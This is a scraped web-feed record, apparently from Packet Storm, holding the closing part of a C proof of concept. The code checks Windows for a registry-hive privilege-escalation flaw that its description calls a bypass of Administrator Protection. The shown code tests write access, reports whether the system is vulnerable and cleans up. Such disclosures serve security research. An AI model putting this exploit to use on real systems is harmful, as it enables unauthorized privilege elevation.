KEY_READ);\\n \\n wprintf(L\\” Write access to Environment: \\”);\\n bool hasWriteAccess = CheckRegistryAccess(shadowEnv, KEY_WRITE);\\n \\n if (hasWriteAccess) {\\n wprintf(L\\”\\\\n[!] WARNING: Already have write access to shadow admin hive!\\\\n\\”);\\n wprintf(L\\”[!] System is VULNERABLE to this attack!\\\\n\\”);\\n }\\n \\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u062b\u063a\u0631\u0629\\n bool isVulnerable = TestVulnerability(userSid, shadowSid);\\n \\n wprintf(L\\”\\\\n[+] ============================================\\\\n\\”);\\n if (isVulnerable) {\\n wprintf(L\\”[+] SYSTEM IS VULNERABLE!\\\\n\\”);\\n wprintf(L\\”[+] AiRegistrySync copies keys with user’s permissions\\\\n\\”);\\n wprintf(L\\”[+] This allows elevation of privilege attacks\\\\n\\”);\\n } else {\\n wprintf(L\\”[+] Could not confirm vulnerability\\\\n\\”);\\n wprintf(L\\”[+] System may be patched or conditions not met\\\\n\\”);\\n }\\n wprintf(L\\”[+] ============================================\\\\n\\\\n\\”);\\n \\n \/\/ \u0627\u0644\u062a\u0646\u0638\u064a\u0641\\n CleanupTestKeys(userSid, shadowSid);\\n \\n wprintf(L\\”[*] PoC completed successfully\\\\n\\”);\\n wprintf(L\\”[*] Press Enter to exit…\\\\n\\”);\\n getchar();\\n \\n return 0;\\n }\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214888″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214888\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-04T16:29:33″,”description”:”This enhanced proof of concept demonstrates an advanced method for bypassing Windows Administrator Protection by manipulating registry hives using both WinAPI and NTAPI. The code…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-39045","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n